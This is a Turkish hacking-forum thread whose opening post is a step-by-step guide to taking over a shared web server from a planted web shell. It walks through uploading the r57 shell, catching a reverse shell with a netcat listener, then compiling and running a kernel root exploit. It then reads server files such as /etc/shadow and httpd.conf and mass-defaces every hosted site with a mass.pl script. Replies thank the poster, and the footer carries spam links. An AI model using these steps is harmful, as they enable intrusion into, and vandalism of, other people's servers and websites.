Server Hack Anlatım !

HeRoTurk

Özel Üye
Katılım
21 Eyl 2012
Mesajlar
1,442
Tepkime puanı
0
Puanları
0
Web sitesi
p1c-m4rsel.org
herkes shell ile web sitesi hackliyor artık hemen hemen bütün basit sitelerde RFI denilen açıklardan var. peki bu basit portal sitelerinden yola çıkarak neler yapılır dersiniz.?

herhangi bri web sitene yedirmiş oldugumuz shell(c99 r57 bypass vs vs.) ile bütün SERVER ı ele geçirmek mümkün.

®BUNU UYGULAMALI YAPALIM®

ÖN HAZIRLIK:

öncelikle yedirmiş oldugumuz shell üzerinden yola çıkarak server elegeçiriyoruz.

öncelikle bir siteye c99 baglandı isek bu siteye index atmadan önce r57 txt de açıp kaydederken .php diye kaydediyoruz bilgisayarımıza.

daha sonra c99 banladıgımız siteye upload bölümünde r57.php upload ediyoruz. upload ettigimiz r57.php açıyoruz.

burası bir kenarda dursun işimdi diyer hazırlıkları yapalım:

modemimizde port açmamız gerekecek şimdi modem ayarlarından herhan gibir (6589) port açıyor.

netcat denen ufak bir programı nidiriyoruz ve pcmizde system32 açıyoruz.

®HAZIRLIK TAMAM UYGULAMAYA GEÇİYORUZ®

şimdi ön hazırlıkları tamamladık

yukarda r57.php upload ettigimiz siteye gidip upload edilin l ink üzerinden r57 çalıştıroyoruz.

daha sonra başlat/çalıştır/cmd

diyiyoruz karşımıza glen ekranda nc -vv -l port no yazıyoruz ve karşımza listening any 6589... diye bri yazı gelecek bunu oldugu gibi bırakıyoruz ve tekrar hedef siteye dönüyoruz.
r57.php baglanılmış siteni el altında back connect seçenegi var ordaki port yazılı olan yeri silip biraz önce netcat ile verdgimizi komuttaki potu yazıyoruz ve connect diyoruz.

biraz bekledikten sonra yukarda verdigimiz listening any 6589... altında connect to 10.0.0.2 server.hedefsite.com ve server sürümü karşımza geliyor. evet artık server girdik artık bütün serverda istedigimiz yapacagız.

PEKİ NASIL :

şimdi yukardaki yazıda server sürümü atıyorum linux 2.6.14 olsun

herhangi bir exploit sitesinden bu exploit bulup bilisayarımıza (isim).c diye kaydediyoruz. burdaki eexploit adımız root olsun.

daha sonra siteye r57.php upload eder gibi root.c upload ediyoruz.

yine ms dos ekranımıza dönüp ls yazıp enter diyoruz. ve karşımza exploit yazılı oldugu bbölge geliyor örnegin (linux2.6.14.c) devam ediyoruz

gcc -o root root.c diyoruz.DİKKAT BİRİNCİ YAZDIGIMIZ SONUNDA .C YOK.
ls tekrar yazdımızda busefer karşımıza alt alta iki tane root yazsısı geliyor. birinci root.c ikinsi ise root

bu demek oluyorki exploit derlendi kullanıma hazır.

chmod 777 root diyoruz. (bunu dememizdeki amaç serverda exploit tam yetki saglamak)

./root deyip exploit çalıştırıyoruz. ve beklemeye koyuluyoruz.

biraz bekledikten sonra uid-0(root) gid-0(root)... yazılar gelecek. EVET ARTIK SERVER LOCAL OLARAK BAGLANDIK VE SİSTEMİ TAMAMEN ELE GEÇİRDİK

ŞİMDİ BAKALIM BU SEVERDA KAÇ TANE DOMAİN VAR.

domainlere bakacagımız dinler


/etc/httpd/conf/httpd.conf

/var/cpanel

etc/shadow
/var/named



bu dizinlerden cd/etc/httpd/conf/httpd.conf geçiyoruz(yukardakdizinlerden başkarına geçiş yapabilirsiniz illa bu dizinde oalcak diye brişey yok)

ls ve serverdaki main listesine ulaşıyoruz.

EVET ARTIK BÜTÜN SERVER İNDEX ATALIMMI

DEVAM EDİYORUZ

şimdi bize buiş için gerekli olan mass.pl adında bir perl exploit bu exploit de yukarda r57.php upload ettigmiz dizine upload ediyoruz.

r57ekranın en üstündeki pwd deki yazıları kopyalıyoruz (/home/public vs vs gibi yazılar)

yine msdos da kaldıgımız yerde

cd pwp deki uzantıyı yazıp enter diyoruz

perl mass.pl yazıp enter deyip çalıştıriyoruz. exploit baglanırken önceden hazırlamış oldugumuz index i en başta r57.php upload ettgiimiz yerede index.html şeklinde upload ediyoruz.

upload işlemi bittikten sorna

ms dosa kaldımız yere

perl mass.pl pwd deki yazıları kopyalıyoruz (/home/public vs vs gibi yazılar)

enter diyoruz ve artık bütün siteye index atmış olduk.

_____________________GEREKLİ DÖKÜMANLAR_________________

ACTİVE PERL. MASS.PL NETCAT
[/hide]
 

AjanCeo

Yeni Üye
Katılım
11 May 2013
Mesajlar
8
Tepkime puanı
0
Puanları
0
bunuda deneyelim
 

Asil_Mehmet

Forumdan Uzaklaştırıldı
Katılım
7 Şub 2013
Mesajlar
1,178
Tepkime puanı
0
Puanları
0
Yaş
28
saolasın eyw :)


bu exploitler serveri rootlayıp tüm serveri hackleyebiliyoruz ama bunu sağlayan bazı sheller falan var Mass.php yada Wordpress joomla gibi Sitelere index basabiliyoruz e demek oluyorki exploit bulmasakta serverin hepsini indirebilirz dimi yani sonuçta aynı görüvimi görüyor Doğrumu?
 

MassCrew

Prof Spys-z
Katılım
21 Nis 2013
Mesajlar
1,116
Tepkime puanı
0
Puanları
0
Yaş
27
bakalım
 

G3nzo

Moderator
Katılım
20 Eyl 2012
Mesajlar
1,992
Tepkime puanı
0
Puanları
36
:) yararlı hero :D
 

Ens4R

Prof Spys-z
Katılım
9 Eki 2012
Mesajlar
1,642
Tepkime puanı
1
Puanları
0
Web sitesi
ajanlar.org
genelde böle konular paylaşılsa cok guzel olur saol kardeşim
 

labis

Forumdan Uzaklaştırıldı
Katılım
28 May 2013
Mesajlar
29
Tepkime puanı
0
Puanları
0
uiuiuiuiiiiiiiiiiiiiiiiiiiii
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012